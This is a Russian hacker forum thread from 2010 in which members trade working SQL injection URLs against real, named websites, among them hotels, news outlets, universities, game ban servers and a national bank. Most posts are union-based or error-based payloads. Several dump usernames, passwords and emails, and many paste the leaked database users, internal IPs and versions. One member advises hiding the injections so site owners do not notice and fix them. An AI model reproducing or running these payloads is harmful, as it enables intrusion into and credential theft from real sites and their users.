RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-04-11 00:52:14.220000
|
|
|
Izja
Сообщений: 607
Оценки: 0
Присоединился: 2010-03-13 14:31:17.890000
|
http://hotelgrange.ru/?type=-4%20union%20select%20group_concat%28login,0x3a,password,0x3a,name,0x3a,email,0x3a,admin+SEPARATOR+0x3C62723E%29+from+auth_user–
http://k-print.ru/?type=-4%20union%20select%20group_concat%28login,0x3a,password,0x3a,name,0x3a,email,0x3a,admin+SEPARATOR+0x3C62723E%29+from+auth_user–
|
|
|
RE: Ваши Sql-инъекции - 2010-04-11 01:12:33.896666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.dknews.kz/article.php?id=877&archid=-36+union+select+1,concat_ws(0x3a3a,user(),version(),database()),3,4,5+–+
http://www.etver.ru/lenta/index.php?newsid=-32531+union+select+1,2,3,fio,city,6,concat_ws(0x20,name,pwd,email,icq),8,9+from+chat_users–+
http://jc.mis.sju.edu.tw/php/getcmd.php?nid=-1+union+select+1,user(),version(),4,database()+–+
|
|
|
RE: Ваши Sql-инъекции - 2010-04-11 16:10:07.420000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://old.openbsd.nu/addcomment.php?newsid=324+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6 5.0.83-log obsdnu@localhost obsdnu
|
|
|
RE: Ваши Sql-инъекции - 2010-04-11 21:42:32.320000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.zimaspb.ru/news.php?id_news=-19+union+select+1,user(),3,4,database(),6,version(%20)/*
|
|
|
RE: Ваши Sql-инъекции - 2010-04-12 03:23:44.190000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
quote:
http://www.portalmercosur.com/buy.php?id=-462+union+select+1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7,8– 5.0.89-community portalme_alibaba@localhost portalme_alibaba
|
|
|
RE: Ваши Sql-инъекции - 2010-04-12 15:21:04.916666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.traffictechnologytoday.com/news.php?NewsID=11441+UNION+SELECT+1,2,3,concat_ws(0x3a,admin,admin_pw,admin_fullname,admin_email),5,6,7,8,9,10+from+passenger_ads.phpads_config–
|
|
|
RE: Ваши Sql-инъекции - 2010-04-12 16:06:53.180000
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
http://torr.kz/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–+ Всем отписавшимся в теме поставил +10, молодцы, проявляйте активность.
|
|
|
RE: Ваши Sql-инъекции - 2010-04-12 19:05:15.660000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
quote:
http://www.antonpaleev.ru/show.php?id=-999+union+select+1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6,7,8,9,10,11,12,13– 4.1.25-log antonpal@localhost wwwantonpaleevru
|
|
|
RE: Ваши Sql-инъекции - 2010-04-13 07:52:48.970000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.improvisedmusic.ie/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,2,coNCAt(user_email,0x3a,user_pass,0x3a,user_firstname,0x3a,user_firstname),4,5/**/FROM/**/user/**/limit/**/0,1+–+ В самом внизу веб-страницы.
|
|
|
RE: Ваши Sql-инъекции - 2010-04-13 17:32:35.403333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
http://www.voronezh-taxi.ru/?action=street&step=full&id=10&id1=66+union+select+1,2,3,4,concat_ws%280x3a,table_schema, table_name,column_name%29+from+information_schema.columns–+
|
|
|
RE: Ваши Sql-инъекции - 2010-04-13 18:29:31.850000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
quote:
http://www.willisbrazolot.com/profiles.php?staff_id=-1+union+select+1,2,3,4,5,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),7,8– 4.0.27-standard dbm.willisbrazolot.com@web162c6.megawebservers.com main_willisbrazolot_com
|
|
|
RE: Ваши Sql-инъекции - 2010-04-14 14:16:02.900000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.feellove.eu/exptemp/index.php?option=com_expshop&page=show_payment&catid=-2%20UNION%20SELECT%20@@version,@@version,concat(username,0x3a,password)%20FROM%20jos_users–
|
|
|
RE: Ваши Sql-инъекции - 2010-04-14 14:25:28.983333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.synergiepark-stuttgart.de/aktuelles/news_detail.php?nid=8999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),version(),database()),14/*
|
|
|
RE: Ваши Sql-инъекции - 2010-04-14 19:01:03.053333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.hotelsanta.lv/index.php?action=article&id=555+union+select+111,concat_ws(0x3a,user(),version(),database())/*
|
|
|
RE: Ваши Sql-инъекции - 2010-04-14 22:18:40.146666
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://bgicrew.com/resume.php?id=-999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4 user u37350@10.10.153.179 database u37350 version 5.0.67-log ================= http://modules.t-o-m-e.net/module.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, %20version(),user(),database()),11,12,13 User : darkgod@localhost Database : darkdb Version : 5.0.87
|
|
|
RE: Ваши Sql-инъекции - 2010-04-14 23:50:06.423333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.sleekgarments.com/website/news.php?id=-26+union+select+1,concat_ws(0x20,version(),%20database(),%20user()),3,4,5,6,7,8,9– User : 335073_export@172.16.10.122 Database : 335073_garment Version : 4.1.22-standard-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 00:00:21.086666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://sudandeal.net/cont.php?id=1999+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16– User : sudan_sudan@79.171.16.53 Database : sudan_sudan Version : 5.0.32-Debian_7etch11-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 00:12:11.866666
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://servak.lv/bans/ban_details_ex.php?bhid=-999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6+from+amx_webadmins user:x_u14_sid32@server2 version::5.0.84-log database:x_u14_sid32 Довольно популярный в Латвии сервер КС
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 00:18:05.073333
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
quote:
http://route66.com.ua/index.php?id=-56+union+select+1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6– 5.1.30 route66@localhost route66comua
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 03:22:50.690000
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://ggbest.ru/bans/ban_details_ex.php?bhid=-99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6+from+amx_webadmins user:root@localhost db:bans version:5.0.51a-3ubuntu5.5 ============= http://wor.ru/bans/ban_details_ex.php?bhid=-99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6+from+amx_webadmins user:cs_bans_zm@localhost db:admin version:5.0.45-community-nt ========== http://gaming-fusion.eu/banned/ban_details_ex.php?bhid=-99999+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6+from+amx_webadmins user:cs-fuzja@localhost db:cs-fuzja version:5.0.51a-24+lenny3 =========== http://85.114.135.220/CSBan/ban_details_ex.php?bhid=-99999+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6+from+amx_webadmins [email=csbans@m220.magenta.fastwebserver.de]user:csbans@m220.magenta.fastwebserver.de[/email] db:csbans version:5.0.51a-24+lenny2 Угараю всё больше и больше…
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 03:38:00.886666
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=-99999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7 user:dbo197803277@212.227.114.136 db:db197803277 version:4.0.27-max-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 15:15:50.256666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://iids.nau.edu.ua/page.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a3a,version(),database(),user())–
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 15:54:51.130000
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://prodivingservices.com/page.php?ID=-999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18 user:pds@localhost database:pds version:4.1.22
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 17:24:26.910000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://rockiurbanfitness.com.au/trainers.php?id=-8+union+select+1,2,group_concat(user(),0x3a,database(),0x3a,version()),4,5 User: ruf_user@localhost Database: ruf_http Version: 5.0.45-community-nt
|
|
|
RE: Ваши Sql-инъекции - 2010-04-15 19:32:02.170000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
quote:
http://www.kiis.com.ua/index.php?id=10+union+select+1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6,7,8,9– quote:
http://www.kiis.com.ua/index.php?id=10+union+select+1,2,3,4,concat(0x3a,username,0x3a,password,0x3a),6,7,8,9+from+jos_users– 5.1.44-log kiis@sleipnir.carrier.kiev.ua kiis
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 18:05:52.523333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.cashsavings2003.com/category.php?id=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11– User: cashsavings02@208.109.78.34 Database: cashsavings02 Version: 5.0.67-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 18:11:12.886666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.lucienkrief.co.il/showArtist.php?id=21+and+1=0+union+select+concat_ws(0x3a,user(),version(),database()),2 User: lucienk_lucien@localhost Database: lucienk_lucien Version: 5.0.90
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 18:29:55.050000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.ac-psych.org/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())/* User: lacp_ac-psych@81.2.203.24 Database: acpsych_ac-psych Version: 5.0.33-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 21:53:31.066666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.agun.kz/?type=news&id=-1+union+select+1,2,3,4,concat_ws(0x3a,name,password),6,7,8+from+users/*
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 22:17:12.580000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
http://www.nispa.org/_portal/conference.php?cid=0009+union+select+1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8-- 4.1.22-log nispa_sk@10.10.1.67 nispa_sk
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 23:19:39.980000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database(),user()),2-- User: citysite_red@localhost Database: citysite_inf Version: 5.0.22
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 23:24:33.190000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
http://ecadigitallibrary.com/conference.php?cid=-18+union+select+1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7,8,9,10-- 5.0.77-log hearst_eca@localhost hearst_eca
|
|
|
RE: Ваши Sql-инъекции - 2010-04-16 23:41:55.803333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Напоминание-объяснение, почему рекомендуется скули писать именно в скуля , а не через quote:
скуля или вообще просто так - так сложнее найти через поиск на сайте, так реже индексируется, так сложнее выявить скулю даже великому гоголю (тем паче хозяину ресурса, с которого хотят получить гешефт), что означает, что скуля дольше проживет и сможет доставить радость большему кол-ву народа. Спасибо за внимание. Планету хекерам.
|
|
|
RE: Ваши Sql-инъекции - 2010-04-17 07:52:15.703333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://keels-n-wheels.com/show.php?id=140246+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25-- User: root@localhost Database: knw Version: 4.0.14-Max
|
|
|
RE: Ваши Sql-инъекции - 2010-04-18 08:34:19.103333
|
|
|
zer0day
Сообщений: 9
Оценки: 0
Присоединился: 2010-04-15 17:36:11.863333
|
чуш на ка эту покрути http://www.nbg.gov.ge/index.php?m=339&year=2001' National Bank Of Georgia quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and date <= '2001'-31-12' and TO_DAYS(date)<=TO_DAYS(now()) order' at line 2 там еще и xss вроде.
|
|
|
RE: Ваши Sql-инъекции - 2010-04-18 09:13:31.186666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: zer0day чуш на ка эту покрути http://www.nbg.gov.ge/index.php?m=339&year=2001'
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
|
|
|
RE: Ваши Sql-инъекции - 2010-04-18 22:45:50.360000
|
|
|
zer0day
Сообщений: 9
Оценки: 0
Присоединился: 2010-04-15 17:36:11.863333
|
quote:
ORIGINAL: Pashkela
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
а пример получения таблиц можеш написать?)
|
|
|
RE: Ваши Sql-инъекции - 2010-04-18 23:57:25.646666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: zer0day а пример получения таблиц можеш написать?)
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
|
|
|
RE: Ваши Sql-инъекции - 2010-04-20 01:06:36.613333
|
|
|
Saaar
Сообщений: 129
Оценки: 0
Присоединился: 2008-05-19 21:05:59.910000
|
http://www.svenskaspraket.org/view_glagoli.php?id=-1+union+select+1,2,3,4,5,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)--
User: svenskaspraket_@193.202.110.91 Database: svenskaspraket_ Version: 5.0.32-Debian_7etch11-log
http://encycl.anthropology.ru/article.php?id=1+union+select+1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8,9,10--
User: anthropo_visitor@localhost Database: anthropo_encycl Version: 5.0.90-community-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-20 08:12:26.373333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.pirogpiter.ru/index.php?action=viewarticles&id=3-199+union+select+1,concat_ws%280x3a,username,passwd%29,3+from+users--
|
|
|
|
|